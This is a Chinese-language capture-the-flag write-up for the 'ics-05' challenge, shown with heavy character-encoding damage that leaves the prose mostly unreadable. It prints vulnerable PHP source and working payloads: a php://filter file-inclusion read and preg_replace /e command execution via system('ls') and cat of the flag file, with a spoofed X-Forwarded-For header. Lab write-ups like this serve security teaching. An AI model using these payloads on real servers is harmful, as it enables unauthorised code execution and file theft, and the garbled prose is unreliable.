ITÊýÂë ¹ºÎï ÍøÖ· Í·Ìõ Èí¼þ ÈÕÀú ÔĶÁ ͼÊé¹Ý
TxTС˵ÔĶÁÆ÷
¡ýÓïÒôÔĶÁ,С˵ÏÂÔØ,¹ÅµäÎÄѧ¡ý
ͼƬÅúÁ¿ÏÂÔØÆ÷
¡ýÅúÁ¿ÏÂÔØͼƬ,ÃÀŮͼ¿â¡ý
ͼƬ×Ô¶¯²¥·ÅÆ÷
¡ýͼƬ×Ô¶¯²¥·ÅÆ÷¡ý
Ò»¼üÇå³ýÀ¬»ø
¡ýÇáÇáÒ»µã,Çå³ýϵͳÀ¬»ø¡ý
¿ª·¢: C++֪ʶ¿â Java֪ʶ¿â JavaScript Python PHP֪ʶ¿â È˹¤ÖÇÄÜ Çø¿éÁ´ ´óÊý¾Ý Òƶ¯¿ª·¢ ǶÈëʽ ¿ª·¢¹¤¾ß Êý¾Ý½á¹¹ÓëËã·¨ ¿ª·¢²âÊÔ ÓÎÏ·¿ª·¢ ÍøÂçЭÒé ϵͳÔËά
½Ì³Ì: HTML½Ì³Ì CSS½Ì³Ì JavaScript½Ì³Ì GoÓïÑÔ½Ì³Ì JQuery½Ì³Ì VUE½Ì³Ì VUE3½Ì³Ì Bootstrap½Ì³Ì SQLÊý¾Ý¿â½Ì³Ì CÓïÑÔ½Ì³Ì C++½Ì³Ì Java½Ì³Ì Python½Ì³Ì Python3½Ì³Ì C#½Ì³Ì
ÊýÂë: µçÄÔ ±Ê¼Ç±¾ ÏÔ¿¨ ÏÔʾÆ÷ ¹Ì̬ӲÅÌ Ó²ÅÌ ¶ú»ú ÊÖ»ú iphone vivo oppo СÃ× »ªÎª µ¥·´ ×°»ú ͼÀ­¶¡
 
   -> PHP֪ʶ¿â -> ¡¾¹¥·ÀÊÀ½ç¡¿Ê®Æß¡¢ics-05 -> ÕýÎÄÔĶÁ

[PHP֪ʶ¿â]¡¾¹¥·ÀÊÀ½ç¡¿Ê®Æß¡¢ics-05

ÔÚÕâÀï²åÈëͼƬÃèÊö

²½Öè

´ò¿ªÌâÄ¿³¡¾°,¸ù¾ÝÌáʾµã»÷½øÈëÉ豸ά»¤ÖÐÐÄ(ÆäËûÒ³ÃæÒ²µã²»¿ª)
ÔÚÕâÀï²åÈëͼƬÃèÊö

ÔÚÕâÀï²åÈëͼƬÃèÊö
·¢ÏÖÒ³ÃæҲûʲô¿ÉÒÔµã»÷µÄµØ·½,ÂÒµãÁ˼¸Ï·¢ÏÖÔÆƽ̨É豸ά»¤ÖÐÐÄÊÇ¿ÉÒÔµã»÷µÄ,ËäÈ»»¹ÊÇͬһ¸öÒ³Ãæ,µ«ÊǶàÁ˸öget²ÎÊý:
ÔÚÕâÀï²åÈëͼƬÃèÊö
¶øÇÒ²ÎÊýµÄÄÚÈÝ»¹»áÔÚÒ³ÃæÖ®ÖÐÏÔʾ,³¢ÊÔ¿´ÓÐûÓÐxss,ʧ°Ü:
ÔÚÕâÀï²åÈëͼƬÃèÊö
¿´À´²»ÊÇÕâ·½ÃæµÄ¿¼Ìâ,³¢ÊÔÊäÈëindex.php,·¢ÏÖ·µ»ØOk:
ÔÚÕâÀï²åÈëͼƬÃèÊö
ÕâÀﻹûÓп´³öÀ´ÊÇɶ,È»ºóÓÖ³¢ÊÔÊäÈëindex.html,Õâ²Å»ÐÈ»´óÎòÕâ¿éÓÐÎļþ°üº¬:
ÔÚÕâÀï²åÈëͼƬÃèÊö
¼ÈÈ»ÊÇÎļþ°üº¬ÎÒÃǾͳ¢ÊÔÀ´ÀûÓÃËü,³¢ÊÔʹÓÃαЭÒéphp://,Ëü°üº¬Á½¸ö×ÓЭÒé,¹¦Äܲ»Í¬¡£

Ê×ÏÈʹÓÃphp://input¿ÉÒÔ½øÐÐphp´úÂëµÄÌá½»,·¢ÏÖ²»¿ÉÐÐ:
ÔÚÕâÀï²åÈëͼƬÃèÊö
ÎÒÃÇ»»Ò»ÖÖ·½Ê½¼ÌÐø³¢ÊÔ,ʹÓÃphp://filter,ËüÉè¼ÆÓÃÀ´É¸Ñ¡Îļþ,ÎÒÃÇ¿ÉÒÔʹÓÃËüÀ´°üº¬index.phpµÄÎļþ,´Ó¶ø»ñÈ¡Ô´Âë¡£
ÔÚÕâÀï²åÈëͼƬÃèÊö
Ö±½Ó°üº¬·¢ÏÖ»áÖ±½ÓÔËÐÐphpÎļþ,ÄÇÎÒÃÇÔõô»ñµÃÔ´ÂëÄØ,ºÜ¼òµ¥,includeº¯ÊýÖ»»á½«phpÎļþ½øÐÐÖ´ÐÐ,ÎÒÃÇÖ»ÐèÒª½«´«½øÈ¥µÄÎļþÏȽøÐÐbase64±àÂëÔÙ´«¸øËü,¾Í»áÊä³öËüµÄÄÚÈÝÁË,Ò²¾ÍÊÇÔ´Âë:
payload:page=php://filter/read=convert.base64-encode/resource=index.php
ÔÚÕâÀï²åÈëͼƬÃèÊö
µÃµ½Ô´ÂëÖ®ºó½øÐÐbase64½âÂë,¿ÉÒԵõ½Ã÷ÎÄ:

<?php

$page = $_GET[page];//Äõ½²ÎÊý

if (isset($page)) {//Èç¹û´æÔÚ



	if (ctype_alnum($page)) { //Èç¹û¶¼Îª×Öĸ»òÕßÊý×Ö
	?>
	
	    <br /><br /><br /><br />
	    <div style="text-align:center">
	        <p class="lead"><?php echo $page; die();?></p>  //Êä³ö²ÎÊý
	        
	    <br /><br /><br /><br />
	
	<?php
	
	}else{
	
	?>
	        <br /><br /><br /><br />
	        <div style="text-align:center">
	            <p class="lead">
	                <?php
	
	                if (strpos($page, 'input') > 0) {//inputÏ൱ÓÚ½ûÓÃÁË
	                    die();
	                }
	
	                if (strpos($page, 'ta:text') > 0) {
	                    die();
	                }
	
	                if (strpos($page, 'text') > 0) {
	                    die();
	                }
	
	                if ($page === 'index.php') {
	                    die('Ok');//Ϊʲô·µ»ØOkÁË
	                }
	                    include($page);//°üº¬²ÎÊý
	                    die();
	                ?>
	        </p>
	        <br /><br /><br /><br />

<?php
}}


//?¨C1???????????¡ã¨¨?¡°?
£¤¨¨?¡°??o??????¨¨??,?-¡ê??¡§??€??¡®??-??????¨¨???????a¨¨????
¨¦?¡§?oo?¡®??¦Ì?¨¨¡¥?

//ÒÔÉϵĴúÂ붼²»ÖØÒª,ÕæÕýÀûÓõÄÔÚÕâ¿é
if ($_SERVER['HTTP_X_FORWARDED_FOR'] === '127.0.0.1') {
//Èç¹ûÇëÇó°üÖÐHTTP_X_FORWARDED_FORΪ127.0.0.1
    echo "<br >Welcome My Admin ! <br >";

    $pattern = $_GET[pat];
    $replacement = $_GET[rep];
    $subject = $_GET[sub];

    if (isset($pattern) && isset($replacement) && isset($subject)) {
        preg_replace($pattern, $replacement, $subject);//½«subjectÖÐÆ¥ÅäpatternµÄ²¿·ÖÓÃreplacementÌæ»»
    }else{
        die();
    }

}





?>

ctype_alnum($text)º¯Êý»áÆ¥Åä´«Èë²ÎÊýÖÐÊÇ·ñȫΪÊý×Ö»òÕß×Öĸ,Èç¹ûÊÇ·µ»Øtrue,·ñÔò·µ»Øfalse¡£

strpos(string,find,start) º¯Êý²éÕÒfindÔÚÁíÒ»×Ö·û´®stringÖеÚÒ»´Î³öÏÖµÄλÖÃ(´óСдÃô¸Ð)¡£

string ±ØÐè¡£¹æ¶¨ÒªËÑË÷µÄ×Ö·û´®¡£
find ±ØÐè¡£¹æ¶¨Òª²éÕÒµÄ×Ö·û´®¡£
start ¿ÉÑ¡¡£¹æ¶¨Ôںδ¦¿ªÊ¼ËÑË÷¡£

preg_replace($pattern, $replacement, $subject)º¯Êý»á½«subjectÖÐÆ¥ÅäpatternµÄ²¿·ÖÓÃreplacementÌæ»»,Èç¹ûÆôÓÃ/e²ÎÊýµÄ»°,¾Í»á½«replacementµ±×öphp´úÂëÖ´ÐС£

$pattern: ÒªËÑË÷µÄģʽ,¿ÉÒÔÊÇ×Ö·û´®»òÒ»¸ö×Ö·û´®Êý×é¡¢ÕýÔò¡£
$replacement: ÓÃÓÚÌæ»»µÄ×Ö·û´®»ò×Ö·û´®Êý×é¡£
$subject: ÒªËÑË÷Ìæ»»µÄÄ¿±ê×Ö·û´®»ò×Ö·û´®Êý×é¡£

/e ÐÞÕý·ûʹ preg_replace() ½« replacement ²ÎÊýµ±×÷ PHP ´úÂë(ÔÚÊʵ±µÄÄæÏò
ÒýÓÃÌæ»»ÍêÖ®ºó)¡£
Ìáʾ:Ҫȷ±£ replacement ¹¹³ÉÒ»¸öºÏ·¨µÄ PHP ´úÂë×Ö·û´®,·ñÔò PHP »áÔÚ±¨¸æÔÚ°üº¬ preg_replace() µÄÐÐÖгöÏÖÓï·¨½âÎö´íÎó¡£

´úÂëÉó¼ÆÍê±ÏÖ®ºó,¾Í¿ÉÒÔ½øÐÐÀûÓÃÁË
Ê×Ïȹ¹ÔìhttpÇëÇó°ü:²»Òªpage²ÎÊý,Ìí¼ÓX-forwarded-For×Ö¶Î
ÔÚÕâÀï²åÈëͼƬÃèÊö
½ÓÏÂÀ´ÀûÓõÄÊÇpreg_replaceº¯Êý/e©¶´:²é¿´ËùÓÐÎļþ
payload:/index.php?pat=/abc/e&rep=system("ls")&sub=asdsadasabc
ÔÚÕâÀï²åÈëͼƬÃèÊö
·¢ÏÖ¿ÉÒÔ½øÐÐÃüÁîÖ´ÐÐ,²¢ÇÒ·¢ÏÖ¿ÉÒÉĿ¼,½øÈëĿ¼²¢²é¿´Îļþ
payload:/index.php?pat=/abc/e&rep=system("cd%20s3chahahaDir%26%26%20ls")&sub=asdsadasabc
%26Ϊ&,ÕâÀï½øÐÐÁËurl±àÂë,²»½øÐбàÂë»áʧ°Ü
ÔÚÕâÀï²åÈëͼƬÃèÊö
½øÈëflagĿ¼²é¿´Îļþ
payload:/index.php?pat=/abc/e&rep=system("cd%20s3chahahaDir/flag%26%26%20ls")&sub=asdsadasabc
ÔÚÕâÀï²åÈëͼƬÃèÊö
·¢ÏÖflag.phpÎļþ,ʹÓÃcat½øÐв鿴:
payload:/index.php?pat=/abc/e&rep=system("cat%20s3chahahaDir/flag/flag.php")&sub=asdsadasabc
ÔÚÕâÀï²åÈëͼƬÃèÊö
³É¹¦·¢ÏÖflag

×ܽá

phpÎļþ°üº¬ÖÐαЭÒéµÄʹÓÃ
preg_replace()º¯Êý/e©¶´µÄÀûÓÃ

  PHP֪ʶ¿â ×îÐÂÎÄÕÂ
Laravel ÏÂʵÏÖ Google 2fa ÑéÖ¤
UUCTF WP
DASCTF10ÔÂ web
XAMPPÈÎÒâÃüÁîÖ´ÐÐÌáÉýȨÏÞ©¶´£¨CVE-2020-
[GYCTF2020]Easyphp
iwebsec°Ð³¡ ´úÂëÖ´Ðйؿ¨Í¨¹Ø±Ê¼Ç
¶à¸öÏß³Ìͬ²½Ö´ÐУ¬¶à¸öÏß³ÌÒÀ´ÎÖ´ÐУ¬¶à¸ö
php ûʼǼϳ£Ó÷½·¨ (TP5.1)
phpÖ®jwt
2021-09-18
ÉÏһƪÎÄÕ      ÏÂһƪÎÄÕ      ²é¿´ËùÓÐÎÄÕÂ
¼Ó:2021-10-16 19:27:03  ¸ü:2021-10-16 19:27:43 
 
¿ª·¢: C++֪ʶ¿â Java֪ʶ¿â JavaScript Python PHP֪ʶ¿â È˹¤ÖÇÄÜ Çø¿éÁ´ ´óÊý¾Ý Òƶ¯¿ª·¢ ǶÈëʽ ¿ª·¢¹¤¾ß Êý¾Ý½á¹¹ÓëËã·¨ ¿ª·¢²âÊÔ ÓÎÏ·¿ª·¢ ÍøÂçЭÒé ϵͳÔËά
½Ì³Ì: HTML½Ì³Ì CSS½Ì³Ì JavaScript½Ì³Ì GoÓïÑÔ½Ì³Ì JQuery½Ì³Ì VUE½Ì³Ì VUE3½Ì³Ì Bootstrap½Ì³Ì SQLÊý¾Ý¿â½Ì³Ì CÓïÑÔ½Ì³Ì C++½Ì³Ì Java½Ì³Ì Python½Ì³Ì Python3½Ì³Ì C#½Ì³Ì
ÊýÂë: µçÄÔ ±Ê¼Ç±¾ ÏÔ¿¨ ÏÔʾÆ÷ ¹Ì̬ӲÅÌ Ó²ÅÌ ¶ú»ú ÊÖ»ú iphone vivo oppo СÃ× »ªÎª µ¥·´ ×°»ú ͼÀ­¶¡

360ͼÊé¹Ý ¹ºÎï Èý·á¿Æ¼¼ ÔĶÁÍø ÈÕÀú ÍòÄêÀú 2024Äê12ÈÕÀú -2024/12/28 13:49:22-

ͼƬ×Ô¶¯²¥·ÅÆ÷
¡ýͼƬ×Ô¶¯²¥·ÅÆ÷¡ý
TxTС˵ÔĶÁÆ÷
¡ýÓïÒôÔĶÁ,С˵ÏÂÔØ,¹ÅµäÎÄѧ¡ý
Ò»¼üÇå³ýÀ¬»ø
¡ýÇáÇáÒ»µã,Çå³ýϵͳÀ¬»ø¡ý
ͼƬÅúÁ¿ÏÂÔØÆ÷
¡ýÅúÁ¿ÏÂÔØͼƬ,ÃÀŮͼ¿â¡ý
  ÍøÕ¾ÁªÏµ: qq:121756557 email:121756557@qq.com  ITÊýÂë
Êý¾Ýͳ¼Æ